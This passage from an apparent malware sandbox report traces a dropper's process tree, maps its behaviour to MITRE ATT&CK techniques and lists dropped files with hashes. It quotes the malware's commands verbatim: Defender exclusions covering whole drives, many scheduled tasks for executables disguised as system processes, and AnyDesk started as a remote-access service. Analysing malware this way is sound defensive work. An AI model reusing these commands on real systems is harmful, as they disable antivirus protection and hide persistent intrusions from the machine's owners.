- Suspicious use of WriteProcessMemory
PID:2404

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\runtimeMonitor\PsYm20I.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3976

C:\runtimeMonitor\ComdriverSvc.exe
"C:\runtimeMonitor\ComdriverSvc.exe"
5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/runtimeMonitor/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pfm9XEGT47.bat"
6⤵
PID:4392

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
7⤵
PID:3652

C:\Program Files\Windows Multimedia Platform\conhost.exe
"C:\Program Files\Windows Multimedia Platform\conhost.exe"
7⤵
- Executes dropped EXE
PID:4456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3256

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\odt\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\odt\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Multimedia Platform\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\odt\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Multimedia Platform\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:308

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\runtimeMonitor\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\Media\Sonata\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Windows\Media\Sonata\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUIS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SearchUI.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SearchUI.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Windows\Media\Sonata\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUIS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SearchUI.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\runtimeMonitor\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\runtimeMonitor\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\runtimeMonitor\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\odt\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\runtimeMonitor\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\runtimeMonitor\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\odt\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\odt\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\runtimeMonitor\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\runtimeMonitor\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\runtimeMonitor\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskkill" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\taskkill.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\odt\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
- Suspicious use of WriteProcessMemory
PID:656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Media Player\de-DE\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\de-DE\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Media Player\de-DE\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\odt\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\Accessories\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows NT\Accessories\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\odt\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\odt\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-US\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Photo Viewer\en-US\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\odt\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Admin\Templates\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Templates\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Templates\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Photo Viewer\en-US\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\odt\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\runtimeMonitor\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\runtimeMonitor\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\runtimeMonitor\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskkillt" /sc MINUTE /mo 13 /tr "'C:\Program Files\Reference Assemblies\Microsoft\taskkill.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskkillt" /sc MINUTE /mo 14 /tr "'C:\Program Files\Reference Assemblies\Microsoft\taskkill.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1408

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --service
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2852

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --control
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5416

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1100

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Winlogon Helper DLL

T1004

Modify Existing Service

T1031

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows Multimedia Platform\conhost.exe
Filesize
1.0MB

MD5
18557c37efdef82648622fa471a2db2f

SHA1
e72f774a0bd16c3d7074a826f7f1711845738972

SHA256
04142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27

SHA512
fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b

Download Submit
C:\Program Files\Windows Multimedia Platform\conhost.exe
Filesize
1.0MB

MD5
18557c37efdef82648622fa471a2db2f

SHA1
e72f774a0bd16c3d7074a826f7f1711845738972

SHA256
04142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27

SHA512
fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b

Download Submit
C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\service.conf
Filesize
2KB

MD5
45ba9b9b5da7df851acb924dc183b586

SHA1
dd3b1ae4d067ac934e2c325e29cba3cd0c0cf7aa

SHA256
56be8c1a2d5efd8aad7ed9e512dd1a40ffd82c1538b7b1e24adeddd52252afcd

SHA512
caa087ded68e648b68eb9a4c0b80cd423123dbd4632ddc695fe3b2f36c4b7188868e2526466e8357c11fcc1f8554db9834a5c1cd8c2faa2bf34fbb1d1b6adeeb

Download Submit
C:\ProgramData\AnyDesk\service.conf
Filesize
2KB

MD5
74169b451a1b54d31de48200f4143a41

SHA1
285862d866874e36557280a04d87f8d88c5b247b

SHA256
26622bc838176e3b50f9f07140a87aebb5156f950b7292bc69ffc0f3071e5007

SHA512
9ba7b0e6486985935779eb32ba46d3995bbca8ed8309555ab3ae5edd9ac05e1fa79b1a7b9783fcc07ff6c2d906fceea03cba36162ffb812618d197b79d182d94

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
370B

MD5
afdc4f69f4720b8c4153f6186f49a2b6

SHA1
329c27ea36d7913809b0c239bb58e91d2ee468ac

SHA256
9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571

SHA512
3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
03461296ec1d93279b9676288b1cdbf0

SHA1
e93a9faf729c9097fad905432a064f819148d833

SHA256
9f78dd8f79e0aa00e49c18a55de39a2c7d19ed12a1b06ff33dfde2a57b14d9a6

SHA512
23b9b8eae26d84cd65f6fa6935edc2225606e2caff54dcb4e67b510da1190a6188eaac199383cfb5c0db24affc6a199b92c10f08f52e1c4cfdc1339230a8cfe5

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
03461296ec1d93279b9676288b1cdbf0

SHA1
e93a9faf729c9097fad905432a064f819148d833

SHA256
9f78dd8f79e0aa00e49c18a55de39a2c7d19ed12a1b06ff33dfde2a57b14d9a6

SHA512
23b9b8eae26d84cd65f6fa6935edc2225606e2caff54dcb4e67b510da1190a6188eaac199383cfb5c0db24affc6a199b92c10f08f52e1c4cfdc1339230a8cfe5

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
03461296ec1d93279b9676288b1cdbf0

SHA1
e93a9faf729c9097fad905432a064f819148d833

SHA256
9f78dd8f79e0aa00e49c18a55de39a2c7d19ed12a1b06ff33dfde2a57b14d9a6

SHA512
23b9b8eae26d84cd65f6fa6935edc2225606e2caff54dcb4e67b510da1190a6188eaac199383cfb5c0db24affc6a199b92c10f08f52e1c4cfdc1339230a8cfe5

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
03461296ec1d93279b9676288b1cdbf0

SHA1
e93a9faf729c9097fad905432a064f819148d833

SHA256
9f78dd8f79e0aa00e49c18a55de39a2c7d19ed12a1b06ff33dfde2a57b14d9a6

SHA512
23b9b8eae26d84cd65f6fa6935edc2225606e2caff54dcb4e67b510da1190a6188eaac199383cfb5c0db24affc6a199b92c10f08f52e1c4cfdc1339230a8cfe5

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
77ff65e33e3bd65b00066e7392994975

SHA1
746fbe752f7e04b35425ed1d8eb7901959e951f0

SHA256
27d8f075b515d324b85f7926f802725f8f165f5fb4b2c0b34ac06bfcae3a0c60

SHA512
6bd21c1ef35840835b6dda9c52cbbb84ba2f1fab2f47b09f47748d14b2c1f965e06033d939c64f31cb466fc8d928b8ff066e2e8e05f209720987f2c386db4360

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
77ff65e33e3bd65b00066e7392994975

SHA1
746fbe752f7e04b35425ed1d8eb7901959e951f0

SHA256
27d8f075b515d324b85f7926f802725f8f165f5fb4b2c0b34ac06bfcae3a0c60

SHA512
6bd21c1ef35840835b6dda9c52cbbb84ba2f1fab2f47b09f47748d14b2c1f965e06033d939c64f31cb466fc8d928b8ff066e2e8e05f209720987f2c386db4360

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
77ff65e33e3bd65b00066e7392994975

SHA1
746fbe752f7e04b35425ed1d8eb7901959e951f0

SHA256
27d8f075b515d324b85f7926f802725f8f165f5fb4b2c0b34ac06bfcae3a0c60

SHA512
6bd21c1ef35840835b6dda9c52cbbb84ba2f1fab2f47b09f47748d14b2c1f965e06033d939c64f31cb466fc8d928b8ff066e2e8e05f209720987f2c386db4360

Download Submit
C:\ProgramData\any.exe
Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
C:\ProgramData\curl.exe
Filesize
5.2MB

MD5
8b82aeac833969d89948487bf7cd87a7

SHA1
b390e693cd9e9d7aa6f87e8ceb1ea47996191897

SHA256
80d963b634e7eae4161b3721c41c37fb852f7550b2b49ba154a1cbed60bf8896

SHA512
f01a154dd46008e90c9f29bc0b0d275c37fd11105e0957762294da6d1ef633774eb004a7dcd63946b5cc4f768667f4594a8fbf7ce25123d8abb59bad1619b2e6

Download Submit
C:\ProgramData\dc.exe
Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
C:\ProgramData\wsappz.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
